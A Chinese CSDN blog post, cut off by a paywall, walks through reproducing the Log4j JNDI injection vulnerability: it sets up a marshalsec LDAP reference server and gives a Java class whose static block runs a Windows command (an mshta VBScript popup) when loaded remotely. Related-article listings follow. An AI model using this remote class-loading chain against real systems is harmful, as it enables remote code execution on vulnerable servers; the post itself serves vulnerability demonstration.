log4j漏洞,jndi侵入验证复现

最新推荐文章于 2024-05-29 07:43:29 发布
最新推荐文章于 2024-05-29 07:43:29 发布
阅读量1.5k 收藏 4
点赞数 2
分类专栏: JAVA 文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36270700/article/details/121898146
版权

log4j的1.14.1往下版本

需要先搭建一个LDAP服务器,git地址

git clone https://github.com/mbechler/marshalsec.git

执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令

"http://127.0.0.1/fileService/download/1/1/#test" 8888

 意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口

然后编写test类

public class test {
    static{
        try {
            Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

test类执行了一个cmd指令,执行了一段vb程序语句

将他编译成class,放到文件服务器上,这里随便搭建什么文件服务器都行,给LDAP用。

我这边是用现有的外网远程服务器,http://127.0.0.1/fileService/download/1/1/

最低0.47元/天 解锁文章
蔷薇思绪
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LOG4J RCE 漏洞分享与自查.pdf
12-15
本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决方案。 漏洞原因: Log4j RCE 漏洞是由于 Log4j2 2.10.0 版本中的 Lookup 模块存在的漏洞。Lookup 模块允许用户在日志格式字符串中插入变量,从而...
log4j2.17.2
04-14
Log4j2漏洞(CVE-2021-44228)的本质在于,攻击者可以通过操纵日志输入,触发JNDIJava Naming and Directory Interface)查询,进而执行任意远程代码。这个漏洞的严重性在于,它允许攻击者无需任何权限即可完全...
log4j2 jndi注入漏洞复现
热门推荐
朴实,坚持,兴趣
12-12 1万+
log4j2 jndi注入漏洞复现
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 955
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
JAVA安全之Log4j-Jndi注入原理以及利用方式
最新发布
qq_53058639的博客
05-29 751
JDNI(Java Naming and Directory Interface)是Java命名和目录接口,它提供了统一的访问命名和目录服务的API。JDNI主要通过JNDI SPI(Service ProviderInterface)规范来实现,该规范定义了对JNDI提供者应实现的接口。在JNDI体系中,JNDI提供者是指实际提供命名和目录服务的软件组件。JNDISPI规范包含了多个接口,其中最为重要的是Context接口。
Log4j2JNDI注入漏洞复现测试
zhangxm_qz的博客
12-19 2983
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
封装JNDI操作LDAP服务器的工具类(1)
iteye_17276的博客
01-27 172
封装JNDI操作LDAP服务器的工具类(1) LDAP操作封装类 作者:廖武锋 MSN:liaowufeng1111@hotmail.com QQ:38773367 Email:moaihe1111@163.com 本人为作者原创,若转贴,请保留作者署名,谢谢! LDAP操作封装类  目标:使用者只需要会使用List,Map 数据结构,将对LDAP的操作进行封装 类:主要有三个类 1 Env类...
Log4j核弹级bug复现及解决方案
wangdakaiwandashuai的博客
12-14 1591
Log4j核弹级bug
log4j远程执行漏洞,测试源码
12-22
2021年12月,研究人员发现了一个允许任意代码执行的严重漏洞,它存在于Log4j 2的JNDIJava Naming and Directory Interface)查找功能中。攻击者只需要在日志消息中插入特定的恶意格式字符串,就能触发远程代码执行...
log4j2漏洞检测工具
05-07
然而,在2021年12月初,研究人员发现Log4j2的一个严重漏洞,允许攻击者通过注入JNDIJava Naming and Directory Interface)链接来执行任意代码。由于Log4j2被广泛应用在各种软件和系统中,这个漏洞的影响范围非常...
JNDI&RMI&LDAP介绍+log4j分析
enhengzZ的博客
02-16 1549
JNDI JNDIjava Naming and Directory Interfac即java命名与目录接口 Naming是命名服务,Director指目录服务。 通过调用JNDI的API应用程序可以定位资源和其他程序对象。JNDIJava EE的重要部分,,JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。 命名服务 对资源命名方便下次调用,Naming的资源要唯一,每一个资源绑定一个名字 目录服务 顾名思义,和计算机的文件系统很像,具体来说,dns就是一
虚拟ldap服务器,什么是LDAP,LDAP服务器是什么?
weixin_28989357的博客
08-13 739
从上述定义不难看出LDAP是一个目录,那么该目录是如何出现,有什么用呢?在当今的信息世界,网络为人们提供了丰富的资源。随着网络资源的日益丰富,迫切需要一种能有效管理资源信息并利于检索查询的服务技术。目录服务技术随之产生。1.LDAP目录服务可以有效地解决众多网络服务的用户账户问题。2.LDAP目录服务规定了统一的身份信息数据库、身份认证机制和接口,实现了资源和信息的统一管理,保证了数据的一致性和完...
封装JNDI操作LDAP服务器的工具类2
weixin_33948416的博客
07-02 365
packagecom.common.ldapconnection; importjava.util.Properties; importjavax.naming.Context; importjavax.naming.NamingException; importjavax.naming.directory.DirContext; importjava...
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7564
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Java日志:log4j JNDI漏洞分析
Yal_insist的博客
04-16 1115
Java日志:log4j JNDI漏洞分析
封装JNDI操作LDAP服务器的工具类(3)
AresYM
07-18 95
[code="java"] package com.common.ldapconnection; import java.util.List; import java.util.Vector; /** * * 功能描述:ldap的处理类,提供了各种操作ldap的方法。 * @author liaowufeng * @version 1.0 */ ...
扩展Log4j支持JNDI数据源
weixin_33816821的博客
04-04 284
log4j.properties配置文件: log4j.rootLogger=INFO,db #使用log4j扩展支持JNDI数据源 log4j.appender.db=com.qdgswx.log4j.ds.JndiDSAppender log4j.appender.db.jndiName=wstjndi log4j.appender.db.BufferSize=1 log4...
记录一次针对log4jjndi注入攻击
大兵的博客
12-16 3550
事件经过 今天一到公司就被钉钉监控报警群@了,报错类型如下图所示: com.mysql.jdbc.MysqlDataTruncation:Data truncation:Data too long for column这个错误很常见,就是插入数据到数据库中,字段长度超过了数据库限制的长度。 于是我就去skywalking上找日志,看到底是什么参数超过了长度限制,于是我找到了报错的链路看到了网关打印的日志信息如下: 重点看我红线框出的部分,这一看就不是一个正常的传参,看起来像是某种攻击。 由此让我联想到,
log4j漏洞测试步骤
08-05
log4j漏洞测试是为了检测和验证系统中是否存在log4j漏洞,以下是一种常见的log4j漏洞测试步骤: 1. 查看系统中是否使用了log4j:首先,我们需要确认系统是否使用了log4j作为日志记录框架。可以查看系统代码或者依赖...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值